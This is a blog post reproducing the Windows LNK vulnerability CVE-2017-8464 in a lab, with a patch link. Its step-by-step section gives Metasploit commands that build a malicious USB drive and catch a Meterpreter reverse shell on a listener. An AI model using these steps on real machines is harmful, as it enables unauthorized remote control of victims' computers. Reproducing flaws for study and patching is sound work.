Tag:stuxnet

Tag (stuxnet)'s result:

stuxnet repeat(cve-2017-8464)

0x01 Overview In June 2017,Microsoft posted a patch for cve-2017-8464,this bug allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly handled during icon display in Windows Explorer or any other application that parses the icon of the shortcut. aka “LNK Remote Code Execution Vulnerability.”. It like stuxnet,so some people call it the three generations of stuxnet.In this article,I will repeat cve-2017-8464. 0x02 The effects of range Windows 7 SP1 Windows 8 Windows 8.1 Windows RT 8.1 Windows 10 Gold, 1511, 1607, 1703 Windows Server 2008 SP2 and R2 SP1 Windows Server 2012 Gold and R2 Windows Server 2016 0x03 Trigger conditions 1.Open automatically play(It worked!) 2.Browse the catalog(It worked! 3.Access the file directory through a network share(I did not test this) 0x04 Bug repeat Environment: Drone: win7(32bit) Attacker: kali Tools: MSF,u disk Step 1: Download the last metasploit,then copy modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb to /usr/share/metasploit-framework/modules/exploits/windows/fileformat. And copy data/exploits/cve-2017-8464 to /usr/share/metasploit-framework/data/exploits. Step 2: msfconsole use exploit/windows/fileformat/cve_2017_8464_lnk_rce set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your ip exploit Step 3: cp /root/.msf4/local/ /root/cve-2017-8464-lnk Step 4: cp the all 24 files to the root folder of the target USB drive Step 5: use multi/handler set paylaod windows/meterpreter/reverse_tcp set LHOST your ip run Step 6: insert your usb to target computer,then you will get a reverse shell. PS: the .cpl file must in  the root folder of the target USB drive! 0x05 Repair Get the patch from MS: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8464 0x06 Conclusion I think this bug is so cool,it like stuxnet,powful and easy to use,so get the patch as fast as possible. 0x07 Reference 1.https://cve.mitre.org/data/downloads/allitems-cvrf-year-2017.xml 2.http://www.4hou.com/system/6938.html 3.http://www.freebuf.com/news/143356.html